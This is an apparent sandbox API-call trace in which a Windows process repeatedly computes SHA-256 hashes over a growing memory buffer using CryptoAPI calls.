	[0225.085] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.086] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.086] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0225.086] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a670
	[0225.086] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a670, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a670, pdwDataLen=0x128ba4) returned 1
	[0225.086] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.086] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.086] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.086] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.086] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0225.086] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a698
	[0225.086] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a698, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a698, pdwDataLen=0x128ba4) returned 1
	[0225.086] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.086] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.086] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.087] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.087] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0225.087] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a6c0
	[0225.087] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a6c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a6c0, pdwDataLen=0x128ba4) returned 1
	[0225.087] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.087] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.087] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.087] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.087] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0225.087] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a6e8
	[0225.087] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a6e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a6e8, pdwDataLen=0x128ba4) returned 1
	[0225.087] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.087] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.087] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.088] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.088] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0225.088] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a710
	[0225.088] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a710, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a710, pdwDataLen=0x128ba4) returned 1
	[0225.088] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.088] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.088] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.088] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.088] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0225.088] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a738
	[0225.088] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a738, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a738, pdwDataLen=0x128ba4) returned 1
	[0225.088] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.088] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.088] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.089] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.089] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0225.089] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a760
	[0225.089] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a760, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a760, pdwDataLen=0x128ba4) returned 1
	[0225.089] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.089] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.089] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.089] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.089] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0225.089] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a788
	[0225.089] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a788, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a788, pdwDataLen=0x128ba4) returned 1
	[0225.089] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.089] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.089] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.090] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.090] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0225.090] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a7b0
	[0225.090] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a7b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a7b0, pdwDataLen=0x128ba4) returned 1
	[0225.090] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.090] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.090] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.090] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.090] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0225.090] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a7d8
	[0225.090] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a7d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a7d8, pdwDataLen=0x128ba4) returned 1
	[0225.090] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.090] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.090] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.091] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.091] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0225.091] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a800
	[0225.091] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a800, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a800, pdwDataLen=0x128ba4) returned 1
	[0225.091] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.091] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.091] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.091] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.091] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0225.091] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a828
	[0225.091] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a828, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a828, pdwDataLen=0x128ba4) returned 1
	[0225.091] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.091] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.091] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.092] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.092] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0225.092] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a850
	[0225.092] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a850, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a850, pdwDataLen=0x128ba4) returned 1
	[0225.092] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.092] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.092] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.092] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.092] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0225.092] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a878
	[0225.092] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a878, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a878, pdwDataLen=0x128ba4) returned 1
	[0225.092] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.092] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.092] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.093] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.093] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0225.093] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8a0
	[0225.127] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a8a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a8a0, pdwDataLen=0x128ba4) returned 1
	[0225.127] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.127] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.127] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.127] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.127] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0225.127] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8c8
	[0225.127] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a8c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a8c8, pdwDataLen=0x128ba4) returned 1
	[0225.127] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.127] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.127] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.128] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.128] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0225.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a8f0
	[0225.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a8f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a8f0, pdwDataLen=0x128ba4) returned 1
	[0225.128] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.128] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.128] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.128] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.128] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0225.128] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a918
	[0225.128] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a918, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a918, pdwDataLen=0x128ba4) returned 1
	[0225.128] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.128] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.128] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.129] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.129] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0225.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a940
	[0225.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a940, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a940, pdwDataLen=0x128ba4) returned 1
	[0225.129] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.129] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.129] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.129] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.129] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0225.129] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a968
	[0225.129] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a968, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a968, pdwDataLen=0x128ba4) returned 1
	[0225.129] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.129] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.129] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.130] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.130] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0225.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a990
	[0225.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a990, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a990, pdwDataLen=0x128ba4) returned 1
	[0225.130] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.130] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.130] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.130] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.130] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0225.130] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a9b8
	[0225.130] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277a9b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a9b8, pdwDataLen=0x128ba4) returned 1
	[0225.130] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.130] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.130] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.131] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.131] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0225.131] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277a9e0
	[0225.131] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277a9e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277a9e0, pdwDataLen=0x128ba4) returned 1
	[0225.131] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.131] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.131] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.131] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.131] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0225.131] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aa08
	[0225.131] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aa08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aa08, pdwDataLen=0x128ba4) returned 1
	[0225.131] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.131] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.131] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.132] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.132] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0225.132] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aa30
	[0225.132] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277aa30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aa30, pdwDataLen=0x128ba4) returned 1
	[0225.132] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.132] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.132] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.132] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
